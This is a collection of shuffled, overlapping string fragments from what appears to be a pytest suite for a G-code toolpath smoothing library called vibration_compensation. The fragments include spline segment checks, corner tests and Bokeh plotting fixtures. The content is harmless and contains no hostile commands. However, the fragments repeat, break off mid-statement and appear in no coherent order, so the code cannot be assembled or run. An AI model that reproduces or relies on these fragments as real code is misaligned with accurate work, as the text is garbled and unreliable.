"generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])",
"a discontinuity at the end of the spline segment\" if self.s > 0:",
"= read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p",
"\"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 +",
"def check_distance(self, spline, line): msg = \"The spline start distance does not match\"",
"300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data =",
"== \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def",
"is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\",
"\\ \"The previous segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12),",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1:",
"== \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start",
"np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist",
"SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment is not on",
"assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\",",
"5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1,",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data)",
"end_error_segment_middle = \"The end point of the spline segment is not on the",
"maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure(",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:,",
"def check_start_point_on(self): msg = \"The start point of the spline segment is not",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def",
"\\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\",",
"data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1]",
"self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start,",
"= \"The closest point of the corner is not close enough\" def check_corner_middle_normal(self):",
"or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif",
"< 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]),",
"Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def",
"\"The endpoint of the corner spline is before the line segment end\" corner_error",
"type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if",
"of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5)",
"start point of the spline segment is not on the middle of the",
"def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30",
"segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0)",
"linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data,",
"assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The",
"X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea -",
"def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01)",
"10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"= generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\"",
"+ np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data)",
"point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg =",
"sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path",
"0) def check_start_point_on(self): msg = \"The start point of the spline segment is",
"the spline segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point,",
"pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of",
"data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy,",
"\"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else:",
"0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def",
"np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point -",
"start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start",
"100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3,",
"0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts =",
"start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20,",
"X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter):",
"does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment",
"points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return",
"data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ],",
"assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg =",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter):",
"spline segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end))",
"np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data)",
"import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename",
"match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the",
"def check_end_point_end(self): msg = \"The end point of the spline segment does not",
"self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline segment",
"== pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of the",
"200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([",
"1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts)",
"def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01)",
"abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at the",
"corner_error = \"The closest point of the corner is not close enough\" def",
"assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start),",
"l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\",",
"return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000,",
"s, start, end, False) if start == \"start\": checker.check_start_point_start() elif start == \"on\":",
"250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:,",
"= data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy -",
"\\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data",
"abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker =",
"pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of the spline",
"\"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0,",
"corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"of the spline segment is not on the middle of the line\" assert",
"+ \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data =",
"start do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The",
"point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 + linea return",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data,",
"s, start, end): checker = SegmentChecker(data, l, s, start, end, False) if start",
"data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" )",
"assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The",
"assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\",",
"< 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]),",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data,",
"l, s, start, end, False) if start == \"start\": checker.check_start_point_start() elif start ==",
"np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20,",
"as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\")",
"data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\"",
"plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1",
"self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if",
"np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self):",
"assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\",",
"\"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\":",
"== \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter):",
"short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2,",
"the spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg)",
") p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\"",
"elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False,",
"== 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") #",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data,",
"np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10,",
"def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self):",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1,",
"abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point of the spline",
"linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end,",
"Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"+ np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10",
"x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0],",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter):",
"\"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\"",
"self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point,",
"check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\",",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def",
"corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end, True)",
"is not on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point,",
"Note that this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data,",
"s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50])",
"X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"import * import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as",
"spline, line): msg = \"The spline start distance does not match\" if line",
"does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12)",
"t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data =",
"that this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1,",
"np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l <",
"def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0)",
"test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert",
"10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1)",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0,",
"+ np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data)",
"== pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) ==",
"def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self):",
"the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end ==",
"not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self):",
"l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\",",
"pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1",
"end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline is before",
"np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]),",
"\\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\",
"msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of the spline",
"does not match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length *",
"abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment is not",
"== \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end ==",
"True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else:",
"l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10",
"assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100,",
"return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def",
"= data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4,",
"abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle",
"if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end",
"ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def",
"= \"The end point of the spline segment does not match the line",
"def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01)",
"Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data,",
"plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5",
"end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end",
"start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start ==",
"the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end",
"point): mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point -",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter):",
"generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100",
"generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10,",
"np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data)",
"== \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end",
"s, start, end, corner): self.data = data self.s = s self.start = start",
"\"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\",",
"self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the",
"s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line",
"not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def",
"not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg",
"and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif",
"abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of the",
"== 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data,",
"1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"== \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle()",
"s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1)",
"0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def",
"start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"\"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
